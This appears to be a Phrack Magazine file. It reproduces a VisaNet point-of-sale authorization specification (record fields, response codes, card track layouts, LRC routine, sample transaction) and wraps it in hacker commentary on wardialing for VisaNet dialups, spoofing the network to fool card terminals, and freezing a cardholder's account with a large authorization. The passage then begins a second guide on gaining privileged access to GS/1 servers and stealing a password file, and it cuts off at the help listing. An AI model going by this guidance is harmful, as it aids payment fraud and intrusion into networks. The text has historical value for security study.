SEPARATOR The authorization record format specifies the use of the "FS" character. 4.38 AGENT NUMBER This six-digit field contains an agent number assigned by the signing member. The number identifies an institution which signs merchants as an agent of a member. The member uses this number to identify the agent within the member systems. The acquirer BIN, Agent, Chain, Merchant, Store, and Terminal numbers are required to uniquely identify a terminal within the VisaNet systems. 4.39 CHAIN NUMBER This six-digit field contains a merchant chain identification number assigned by the singing member. The member uses this number to identify the merchant chain within the member systems. The acquirer BIN, Agent, Chain, Merchant, Store, and Terminal numbers are required to uniquely identify a terminal within the VisaNet systems. 4.40 BATCH NUMBER This three-digit field contains a batch sequence number generated by the terminal. The number will wrap from 999 to 001. This number is that data capture batch number. 4.41 REIMBURSEMENT ATTRIBUTE This is a single character fixed length field. This field contains the reimbursement attribute assigned by the singing member. This field must be a "space". 4.42 FIELD SEPARATOR The authorization record format specifies the use of the "FS" character. 4.43 APPROVAL CODE This contains a six-character fixed length field. This field is only present in cancel transactions and contains the original approval code from the original transaction. The approval code was returned in the authorization response of the transaction to be canceled. 4.44 SETTLEMENT DATE This contains a four-digit fixed length field. This field is only present in cancel transactions and contains the settlement date from the original transaction and is in the format MMDD. The settlement date was returned in the authorization response of the transaction to be canceled. 4.45 LOCAL TRANSACTION DATE This contains a four-digit fixed length field. This field is only present in cancel transactions and contains the transaction date from the original transaction and is in the format MMDD. The transaction date was returned in the authorization response of the transaction to be canceled as MMDDYY. 4.46 LOCAL TRANSACTION TIME This contains a six-digit fixed length field. This field is only present in cancel transactions and contains the transaction time from the original transaction and is in the format HHMMSS. The transaction time was returned in the authorization response of the transaction to be canceled. 4.47 SYSTEM TRACE AUDIT NUMBER This contains a six-character fixed length field. This field is only present in cancel transactions and contains the trace audit number from the original transaction. The trace audit number was returned in the authorization response of the transaction to be canceled. 4.48 ORIGINAL AUTHORIZATION TRANSACTION CODE The field is a two-character fixed length field and must contain the original AUTHORIZATION TRANSACTION CODE (filed 4.12) of the transaction to be canceled. Currently, the only transaction that can be canceled in an Interlink Debit Purchase. 4.49 NETWORK IDENTIFICATION CODE This contains a single character fixed length field. This field is only present in cancel transactions and contains the network ID from the original transaction. The network ID was returned in the authorization response of the transaction to be canceled. 4.50 FIELD SEPARATOR The authorization record format specifies the use of the "FS" character. 5.0 RESPONSE RECORD DATA ELEMENT DEFINITIONS The following subsections will define the authorization response record data elements. 5.01 PAYMENT SERVICE INDICATOR This field contains the one-character payment service indicator. It must be placed in the batch detail record for terminals that capture. Table 5.01 provides a summary of current Values. TABLE 5.01 Payment Service Indicator Values VALUE DESCRIPTION ------------------------------------------------------------------ A REPS qualified Y Requested a "Y" in field 4.14 and there was a problem REPS denied (VAS edit error or BASE I reject) N Requested an "N" in field 4.14 or requested a "Y" in field 4.14 and request was downgraded (by VAS) space If "Y" sent and transaction not qualified (VAS downgrade) ------------------------------------------------------------------- 5.02 STORE NUMBER This four-digit number is returned by VisaNet from the authorization request fo r formats "J" and "G", and can be used to route the response within a store controller and/or a store concentrator. 5.03 TERMINAL NUMBER This four-digit number is returned by VisaNet from the authorization request fo r formats "J" and "G", and can be used to route the response within a store controller and/or a store concentrator. 5.04 AUTHORIZATION SOURCE CODE This field contains a one-character code that indicates the source of the authorization. The received code must be placed in the data capture detail transaction record when data capture is enabled. Table 5.04 provides a summary of current codes. TABLE 5.04 Authorization Source Codes Code Description ------------------------------------------------------------------------------- - 1 STIP: time-out response 2 LCS: amount below issuer limit 3 STIP: issuer in Suppress-Inquiry mode 4 STIP: issuer unavailable 5 Issuer approval 6 Off-line approval, POS device generated 7 Acquirer approval: BASE I unavailable 8 Acquirer approval of a referral 9 Use for non-authorized transactions; such as credit card credits [yum!] D Referral: authorization code manually keyed E Off-line approval: authorization code manually keyed ------------------------------------------------------------------------------- - 5.05 TRANSACTION SEQUENCE NUMBER This field contains the four-digit code which was generated by the terminal as the sequence number for the transaction and passed to the authorization center in the authorization request record. The sequence number can be used by the terminal to match request and response messages. The transaction sequence number is returned by VisaNet without sequence verification. 5.06 RESPONSE CODE This field contains a two-character response code indicating the status of the authorization. Table 5.06 provides the response codes for formats "J" and "G". A response cod e of "00" represents an approval. A response code of "85" represents a successfu l card verification returned by TRANSACTION CODES 58, 68, and 88. All other response codes represent a non-approved request. The value returned is stored in the batch transaction detail record for terminals that capture. TABLE 5.06 Authorization Response Codes For Record Formats "J" & "G" Authorization Response AVS Result Response Message Code Response Definition Code ------------------------------------------------------------------------------- - EXACT MATCH 00 Exact Match, 9 digit zip X EXACT MATCH 00 Exact Match, 5 digit zip GRIND Y ADDRESS MATCH 00 Address match only A ZIP MATCH 00 9-digit zip match only W ZIP MATCH 00 5-digit zip match only GRIND Z NO MATCH 00 No address or zip match N VER UNAVAILABLE 00 Address unavailable U RETRY 00 Issuer system unavailable R ERROR INELIGIBLE 00 Not a mail/phone order E SERV UNAVAILABLE 00 Service not supported S APPROVAL 00 Approved and completed see above CARD OK 85 No reason to decline see above CALL 01 Refer to issuer 0 CALL 02 Refer to issue - Special condition 0 NO REPLY 28 File is temporarily unavailable 0 NO REPLY 91 Issuer or switch is unavailable 0 HOLD-CALL 04 Pick up card 0 HOLD-CALL 07 Pick up card - Special condition 0 HOLD-CALL 41 Pick up card - Lost 0 HOLD-CALL 43 Pick up card - Stolen 0 ACCT LENGTH ERR EA Verification Error 0 ALREADY REVERSED 79 Already Reversed at Switch [ya got me] 0 AMOUNT ERROR 13 Invalid amount 0 CAN'T VERIFY PIN 83 Can not verify PIN 0 CARD NO ERROR 14 Invalid card number 0 CASHBACK NOT APP 82 Cashback amount not approved 0 CHECK DIGIT ERR EB Verification Error 0 CID FORMAT ERROR EC Verification Error 0 DATE ERROR 80 Invalid Date 0 DECLINE 05 Do not honor 0 DECLINE 51 Not Sufficient Funds 0 DECLINE 61 Exceeds Withdrawal Limit 0 DECLINE 65 Activity Limit Exceeded 0 ENCRYPTION ERROR 81 Cryptographic Error 0 ERROR xx 06 General Error 0 ERROR xxxx 06 General Error 0 EXPIRED CARD 54 Expired Card 0 INVALID ROUTING 98 Destination Not Found 0 INVALID TRANS 12 Invalid Transaction 0 NO CHECK ACCOUNT 52 No Check Account 0 NO SAVE ACCOUNT 54 No Save Account 0 NO SUCH ISSUER 15 No Such Issuer 0 RE ENTER 19 Re-enter Transaction 0 SEC VIOLATION 63 Security Violation 0 SERV NOT ALLOWED 57 Trans. not permitted-Card 0 SERV NOT ALLOWED 58 Trans. not permitted-Terminal 0 SERVICE CODE ERR 62 Restricted Card 0 SYSTEM ERROR 96 System Malfunction [whoop whoop!] 0 TERM ID ERROR 03 Invalid Merchant ID 0 WRONG PIN 55 Incorrect PIN 0 xxxxxxxxxxxxxxxxxx xx Undefined Response 0 ------------------------------------------------------------------------------- - 5.07 APPROVAL CODE This field contains a six-character code when a transaction has been approved. If the transaction is not approved the contents of the field should be ignored. The approval code is input to the data capture detail transaction record. 5.08 LOCAL TRANSACTION DATE This field contains a six-digit local date calculated (MMDDYY) by the authorization center using the time zone differential code provided in the authorization request message. This date is used by the terminal as the date t o be printed on the transaction receipts and audit reports, and as the date input to the data capture transaction detail record. This field is only valid for approved transactions. 5.09 AUTHORIZATION RESPONSE MESSAGE This field is a sixteen-character field containing a response display message. This message is used by the terminal to display the authorization results. Table 5.06 provides the message summary. The messages are provided with "sp" space fill. This field is mapped to the RESPONSE CODE, field 5.06, for all non-AVS transactions and for all DECLINED AVS transactions. For APPROVED AVS transactions (response code = "00" or "85"), it is mapped to the AVS RESULT CODE, field 5.10. 5.10 AVS RESULT CODE This one-character field contains the address verification result code. An address verification result code is provided for transactions and provides an additional indication that the card is being used by the person to which the card was issued. The service is only available for mail/phone order transactions. Table 5.06 provides a summary of the AVS Result Codes. An ANSI X3.4 "0" is provided for all non-AVS transactions and all declined transactions. 5.11 TRANSACTION IDENTIFIER This numeric field will contain a transaction identifier. The identifier will be fifteen-digits in length if the payment service indicator value is an "A" or it will be zero in length if the payment service indicator value is not an "A". This value is stored in the batch detail record for terminals that capture and is mandatory for REPS qualification. 5.12 FIELD SEPARATOR The authorization record format specifies the use of the "FS" character. 5.13 VALIDATION CODE This alphanumeric field will contain a validation code. The code will contain a four-character value if the payment service indicator value is an "A" or it wil l be zero in length if the payment service indicator value is not an "A". This value is stored in the batch detail record for terminals that capture and is mandatory for REPS qualification. 5.14 FIELD SEPARATOR The authorization record format specifies the use of the "FS" character. 5.15 NETWORK IDENTIFICATION CODE This one-character fixed length field contains the identification code of the network on which the transaction was authorized. The network ID must be printe d on the receipt. 5.16 SETTLEMENT DATE This four-digit fixed length field contains the transaction settlement date returned by the authorizing system (MMDD). The settlement date must be printed on the receipt. 5.17 SYSTEM TRACE AUDIT NUMBER This six-character fixed length field contains a trace audit number which is assigned by the authorizing system. The trace audit number must be printed on the receipt. 5.18 RETRIEVAL REFERENCE NUMBER This twelve-character fixed length field contains the transaction retrieval reference number returned by the authorizing system. The reference number should be printed on the receipt. 5.19 LOCAL TRANSACTION TIME This six-digit fixed length field contains the transaction time returned by the authorizing system (HHMMSS). The time must be printed on the receipt. 6.0 CONFIRMATION RECORD DATA ELEMENT DEFINITIONS The following subsections define the debit confirmation response record data elements. 6.01 NETWORK IDENTIFICATION CODE This one character fixed length field contains the identification code of the network on which the transaction was authorized. The network ID is printed on the receipt. 6.02 SETTLEMENT DATE This four-digit fixed length field contains the transaction settlement date returned by the authorizing system. 6.03 SYSTEM TRACE AUDIT NUMBER This six-character fixed length field contains the system trace audit number which is assigned by the authorizing system. 7.0 CHARACTER CODE DEFINITIONS The following subsections will define the authorization request record characte r set and character sets used for track 1 and track 2 data encoded on the magneti c stripes. The authorization request records are generated with characters defined by ANSI X3.4-1986. The data stored on the cardholder's card in magnetic or optical for m must be converted to the ANSI X3.4 character set before transmission to VisaNet . Section 7.01 provides track 1 character set definition. Section 7.02 provides track 2 character set definition. Section 7.03 provides the ANSI X3.4-1986 and ISO 646 character set definitions. Section 7.04 provides a cross reference between the track 1, track 2, and ANSI X3.4 character sets. Section 7.05 describes the method for generating and checking the Mod 10 Luhn check digit fo r credit card account numbers. Section 7.06 describes the method for generating the LRC byte for the authorization request message and for testing the card swipe's LRC byte. Section 7.07 provides sample data for an authorization request and response for record format "J" testing. The POS device/authorization must perform the following operations on track read data before it can be used in an authorization request message. 1. The LRC must be calculated for the data read from the track and compared to the LRC read from the track. The track data is assumed to be read without errors when on character parity errors are detected and the calculated and read LRC's match. 2. The starting sentinel, ending sentinel, and LRC are discarded. 3. The character codes read from the magnetic stripe must be converted from the encoded character set to the set used for the authorization request message. The characters encoded on track 1 are six-bit plus parity codes and the characters encoded on track 2 are four-bit plus parity codes, wit h the character set used for the request message defined as seven-bit plus parity codes. All characters read from a track must be converted to the request message character set and transmitted as part of the request. The converted track data can not be modified by adding or deleting non-framing characters and must be a one-for-one representation of the characters read from the track. [sounds like they mean it, eh?] 7.1 TRACK 1 CHARACTER DEFINITION Table 7.01 provides the ISO 7811-2 track 1 character encoding definitions. Thi s "standards" format is a SAMPLE guideline for expected credit card track encoding; ATM/debit cards may differ. Actual cards may differ [not], whether they are Visa cards or any other issuer's cards. Each character is defined by the six-bit codes listed in Table 7.01. Track 1 can be encoded with up to 79 characters as shown in Figure 7.01 +---------------------------------------------------------+ |SS|FC| PAN|FS| NAME|FS| DATE| DISCRETIONARY DATA |ES|LRC| +---------------------------------------------------------+ LEGEND: Field Description Length Format ------------------------------------------------------------------------------- - SS Start Sentinel 1 % FC Format Code ("B" for credit cards) 1 A/N PAN Primary Account Number 19 max NUM FS Field Separator 1 ^ NAME Card Holder Name (See NOTE below) 26 max A/N FS Field Separator 1 ^ DATE Expiration Date (YYMM) 4 NUM Discretionary Data Option Issuer Data (See NOTE below) variable A/N ES End Sentinel 1 ? LRC Longitudinal Redundancy Check 1 --- Total CAN NOT exceed 79 bytes-----> 79 ------------------------------------------------------------------------------- - FIGURE 7.01 Track 1 Encoding Definition NOTE: The CARD HOLDER NAME field can include a "/" as the surname separator and a "." as the title separator The DISCRETIONARY DATA can contain any of the printable characters from Table 7.01 TABLE 7.01 Track 1 Character Definition b6 0 0 1 1 BIT NUMBER b5 0 1 0 1 (a) These character positions ------------------------------------------- are for hardware use only b4 b3 b2 b1 ROW/COL 0 1 2 3 ------------------------------------------- (b) These characters are for 0 0 0 0 0 SP 0 (a) P country use only, not for 0 0 0 1 1 (a) 1 A Q international use 0 0 1 0 2 (a) 2 B R 0 0 1 1 3 (c) 3 C S (c) These characters are 0 1 0 0 4 $ 4 D T reserved for added 0 1 0 1 5 (%) 5 E U graphic use [nifty] 0 1 1 0 6 (a) 6 F V 0 1 1 1 7 (a) 7 G W 1 0 0 0 8 ( 8 H X (%) Start sentinel 1 0 0 1 9 ) 9 I Y (/) End sentinel 1 0 1 0 A (a) (a) J Z (^) Field Separator 1 0 1 1 B (a) (a) K (b) / Surname separator 1 1 0 0 C (a) (a) L (b) . Title separator 1 1 0 1 D - (a) M (b) SP Space 1 1 1 0 E - (a) N (^) +-----------------------+ 1 1 1 1 F / (?) O (a) |PAR|MSB|B5|B4|B3|B2|LSB| +-+---+-----------------+ | |--- Most Significant Bit |--- Parity Bit (ODD) Read LSB First 7.02 TRACK 2 CHARACTER DEFINITION Table 7.02 provides the ISO 7811-2 track 2 character encoding definitions. Thi s "standards" format is a SAMPLE guideline for expected credit card track encoding; ATM/debit cards may differ. Actual cards may differ, whether they ar e Visa cards or any other issuer's cards. Each character is defined by the four-bit codes listed in Table 7.02. Track 2 can be encoded with up to 40 characters as shown in Figure 7.02. +--------------------------------------------------------+ |SS| PAN |FS| DATE| DISCRETIONARY DATA |ES|LRC| +--------------------------------------------------------+ LEGEND: Field Description Length Format ------------------------------------------------------------------------------- - SS Start Sentinel 1 0B hex PAN Primary Account Number 19 max NUM FS Field Separator 1 = Discretionary Data Option Issuer Data (See NOTE below) variable A/N ES End Sentinel 1 0F hex LRC Longitudinal Redundancy Check 1 --- Total CAN NOT exceed 40 bytes-----> 40 ------------------------------------------------------------------------------- - FIGURE 7.02 Track 2 Encoding Definition NOTE: The PAN and DATE are always numeric. The DISCRETIONARY DATA can be numeric with optional field separators as specified in Table 7.02. TABLE 7.02 Track 2 Character Set b4 b3 b2 b1 COL (a) These characters are for ------------------------------ hardware use only 0 0 0 0 0 0 0 0 0 1 1 1 (B) Starting Sentinel 0 0 1 0 2 2 0 0 1 1 3 3 (D) Field Separator 0 1 0 0 4 4 0 1 0 1 5 5 (F) Ending Sentinel 0 1 1 0 6 6 0 1 1 1 7 7 1 0 0 0 8 8 +---------------------------+ 1 0 0 1 9 9 | PAR | MSB | b3 | b2 | LSB | 1 0 1 0 A (a) +---------------------------+ 1 0 1 1 B (B) | | 1 1 0 0 C (a) | |--- Most Significant Bit 1 1 0 1 D (D) |--- Parity Bit (ODD) 1 1 1 0 E (a) 1 1 1 1 F (F) Read LSB first [ tables 7.03a, 7.03b, and 7.04 deleted... If you really need a fucking ascii table that bad go buy a book.] [ section 7.05 - Account Data Luhn Check deleted... as being unnecessary obtuse and roundabout in explaining how the check works. the routine written by crazed luddite and murdering thug is much clearer. ] 7.06 CALCULATING AN LRC When creating or testing the LRC for the read of the card swipe, the authorization request record, the debit confirmation record or the VisaNet response record; use the following steps to calculate the LRC: 1) The value of each bit in the LRC character, excluding the parity bit, is defined such that the total count of ONE bits encoded in the corresponding bit location of all characters of the data shall be even (this is also known as an EXCLUSIVE OR (XOR) operation) For card swipes, include the start sentinel, all the data read and the end sentinel. For VisaNet protocol messages, begin with the first character past the STX, up to and including the ETX. 2) The LRC characters parity bit is not a parity bit for the individual parity bits of the data message, but it only the parity bit for the LRC character itself. Calculated as an even parity bit. [ i list a routine for calculating an LRC o a string later on in the document ] 7.07 TEST DATA FOR RECORD FORMAT "J" The following two sections provide sample data for testing record format "J" with the VisaNet dial system. 7.07.01 TEST DATA FOR A FORMAT "J" AUTHORIZATION REQUEST Table 7.07a provides a set of test data for record format "J" authorization request. TABLE 7.07a Test Data For Record Format "J" Test Data Byte # Length Format Field Name ------------------------------------------------------------------------------- - J 1 1 A/N Record Format 0, 2, or 4 2 1 A/N Application Type . 3 1 A/N Message Delimiter 401205 4-9 6 A/N Acquirer BIN 123456789012 10-21 12 NUM Merchant Number 0001 * 22-25 4 NUM Store Number 0001 * 26-29 4 NUM Terminal Number 5999 30-33 4 NUM Merchant Category Code 840 34-36 3 NUM Merchant Country Code 94546 37-41 5 A/N Merchant City Code 108 42-44 3 NUM Time Zone Differential 54 45-46 2 A/N Authorization Transaction Code 12345678 47-54 8 NUM Terminal Identification Number Y 55 1 A/N Payment Service Indicator 0001 * 56-59 4 NUM Transaction Sequence Number @ 60 1 A/N Cardholder Identification Code D, H, T, or X 61 1 A/N Account Data Source Track or Customer Data Field Manual Data "FS" N.A. 1 "FS" Field Separator 0000123 N.A. 0 to 43 A/N Transaction Amount "FS" N.A. 1 "FS" Field Separator ER N.A. 0 or 2 A/N Device Code/Industry code "FS" N.A. 1 "FS" Field Separator N.A. 0 or 6 NUM Issuing/Receiving Institution ID "FS" N.A. 1 "FS" Field Separator 000 N.A. 3 to 12 NUM Secondary Amount (Cashback) "FS" N.A. 1 "FS" Field Separator ------------------------------------------------------------------------------- - NOTE:* Denotes fields that are returned in the response message 7.07.2 RESPONSE MESSAGE FOR TEST DATA Table 7.07b provides the response message for the test data provided in section 7.07.1. TABLE 7.07b Response Message For Test Data - Record Format "J" Test Data Byte # Length Format Field Name ------------------------------------------------------------------------------- - A, Y, N, or * 1 1 A/N Payment Service Indicator "space" 0001 * 2-5 4 NUM Store Number 0001 * 6-9 4 NUM Terminal Number 5 * 1 1 A/N Authorization Source Code 0001 * 11-14 4 NUM Transaction Sequence Number 00 * 15-16 2 A/N Response Code 12AB45 * 17-22 6 A/N Approval Code 111992 * 23-28 6 NUM Transaction Date (MMDDYY) AP ______ 29-44 16 A/N Authorization Response Message 0, Sp, or "FS" 45 1 A/N AVS Result Code *Variable 0 or 15 NUM Transaction Identifier "FS" "FS" Field Separator *Variable 0 or 4 A/N Validation Code "FS" "FS" Field Separator ------------------------------------------------------------------------------- - NOTE: * Move to data capture record for VisaNet Central Data Capture (CDC) ------------------------------------------------------------------------------- - [ section two ] [ finding visanet ] finding visanet isn't hard, but it can be tedious. visanet rents time off of compuserve and X.25 networks. the compuserve nodes used are not the same as their information service, cis. to identify a visanet dialup after connecting, watch for three enq characters and a three second span to hangup. if you've scanned out a moderate portion of your area code, you probably have a few dialups. one idea is to write a short program to dial all the connects you have marked as garbage or worthless [ you did keep em, right? ] and wait for the proper sequence. X.25 connections should work similarly, but i don't know for sure. read the section on visanet usage for other dialup sources. [ section three ] [ visanet link level protocol ] messages to/from visanet have a standard format: stx - message - etx - lrc the message portion is the record formats covered in section one. lrc values are calculated starting with the first byte of message, going up to and including the etx character. heres an algorithm that calculates the lrc for a string. note: in order to work with the visanet protocols, append etx to the string before calling this function. unsigned char func_makelrc(char *buff) { int i; char ch, *p; ch = 0; p = buff; for(;;) { ch = (ch^(*p)); p++; if(!(*p)) break; } return ch; } for a single authorization exchange, the easiest kind of transaction, the sequence goes like this: host enq stx-response-etx-lrc eot term stx-request-etx-lrc ack matching this sequence with test record formats from section one, 7.07, heres an ascii representation of a transaction. control characters denoted in <>'s. [of course, you wouldn't really have a carriage return in middle of a message. duh. ] this transaction would be for card number 4444111122223333 with an expiration date of 04/96. the purchase amount is $1.23. visanet responds with an approval code of 12ab45. host: term: J0.401205123456789012000100015999840945461085412345678Y0001@H444411 112222333304960000123ER000 host: Y00010001500010012AB45111992APPROVAL 12AB45123456789012345 ABCD term: host: authorizing multiple transactions during one connect session is only slightly more complicated. the etx character on all messages sent to visanet are change d to etb and the application type is changed from '0' to '2' [section one 4.02]. instead of responding after a transaction with eot, visanet instead polls the terminal again with enq. this continues until the terminal either changes back to the single transaction format or issues an eot to the host. heres a short list of all control characters used: stx: start-of-text, first message framing character signaling message start etx: end-of-text, the frame ending character the last message of a sequence eot: end-of-transmission, used to end an exchange and signal disconnect enq: enquiry, an invitation to transmit a message or retransmit last item ack: affirmative acknowledgment, follows correct reception of message nak: negative acknowledgment, used to indicate that the message was not understood or was received with errors syn: delay character, wait thirty seconds etb: end-of-block, the end framing character used to signal the end of a messag e within a multiple message sequence other quick notes: visanet sometimes sends ack before stx on responses lrc characters can hold any value, such as stx, nak, etc visanet can say goodbye at any time by sending eot people can get very anal about error flow diagrams [ section four ] [ half the story; central data capture ] a full transaction requires two steps, one of which is described in this document: getting the initial authorization. an authorization does basically nothing to a person's account. oh, you could shut somebody's account down for a day or two by requesting a twenty thousand dollar authorization, but no other ill effects would result. central data capture, the second and final step in a transaction, needs information from both the authorization request and response, which is used to generate additional data records. these records are then sent to visanet by the merchant in a group, usually at the end of each day . [ section five ] [ common applications ] access to visanet can be implemented in a number of ways: directly on a pos terminal, indirectly via a lan, in a hardware specific device, or any permutation possible to perform the necessary procedures. card swipers commonl y seen at malls are low tech, leased at around fifty dollars per month, per terminal. they have limited capacity, but are useful in that all of the information necessary for transactions is self contained. dr delam and maldoro r found this out, and were delighted to play the role of visanet in fooling the little device. close scrutiny of section one reveals atm formats, phone order procedures, and new services such as direct debit from checking/savings and checks by phone. start noticing the stickers for telecheck and visa atm cards, and you're starting to get the picture. [ section seven ] [ brave new world ] could it be? yes, expiration dates really don't matter.... this article written to thank previous Phrack writers... please thank me appropriately... 800#s exist... other services exist... mastercard runs one... never underestimate the power of asking nicely... numerous other formats are available... see section one, 3.0 for hints... never whistle while you're pissing... ==Phrack Ma gazine== Volume Five, Issue Forty-Six, File 17 of 28 **************************************************************************** [<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<] [<> <>] [<> ----+++===::: GETTiN' D0wN 'N D1RTy wiT Da GS/1 :::===+++---- <>] [<> <>] [<> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <>] [<> <>] [<> Brought to you by: <>] [<> [)elam0 Labz, Inc. and ChURcH oF ThE Non-CoNForMisT <>] [<> <>] [<> Story line: Maldoror -n- [)r. [)elam <>] [<> Main Characters: Menacing Maldoror & The Evil [)r. [)elam <>] [<> Unix Technical Expertise: Wunder-Boy [)elam <>] [<> Sysco Technishun: Marvelous Maldoror <>] [<> <>] [<> Look for other fine [)elamo Labz and ChURcH oF ThE <>] [<> Non-CoNForMisT products already on the market such as <>] [<> DEPL (Delam's Elite Password Leecher), NUIA (Maldoror's <>] [<> Tymnet NUI Attacker), TNET.SLT (Delam's cheap0 Telenet <>] [<> skanner for Telix), PREFIX (Maldoror's telephone prefix <>] [<> identification program), and various other programs and <>] [<> philez written by Dr. Delam, Maldoror, Green Paradox, <>] [<> El Penga, Hellpop, and other certified DLI and CNC members. <>] [<> <>] [>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>] Index ======================================== 1. Finding and identifying a GS/1 2. Getting help 3. Gaining top privilege access 4. Finding the boot server 5. Connecting to the boot server 6. Getting the boot server password file 7. Other avenues ---------------------------------------------------------------------------- Here's hacking a GS/1 made EZ (for the sophisticated hacker) It is advisable to fill your stein with Sysco and pay close attention... if Sysco is not available in your area, Hacker Pschorr beer will work almost as good... (especially Oktoberfest variety) What is a GS/1? --------------- A GS/1 allows a user to connect to various other computers... in other words, it's a server, like a DEC or Xyplex. So why hack it? --------------- Cuz itz there... and plus you kan access all sortz of net stuph fer phree. (QSD @ 202557040540 is lame and if you connect to it, you're wasting the GS/1.. the French fone police will fly over to your country and hunt you down like a wild pack of dogs, then hang you by your own twisted pair.) What to do: ----------- +--------------------------------------+ + #1. Finding and identifying a GS/1 + +--------------------------------------+ Find a GS/1 .. they're EZ to identify.. they usually have a prompt of GS/1, though the prompt can be set to whatever you want it to be. A few years ago there were quite a number of GS/1's laying around on Tymnet and Telenet... you can still find a few if you scan the right DNIC's. (If you don't know what the hell I'm talking about, look at some old Phracks and LOD tech. journals.) The prompt will look similar to this: (!2) GS/1> (The (!2) refers to the port you are on) +--------------------+ + #2. Getting help + +--------------------+ First try typing a '?' to display help items. A help listing looks like this: > (!2) GS/1>? > Connect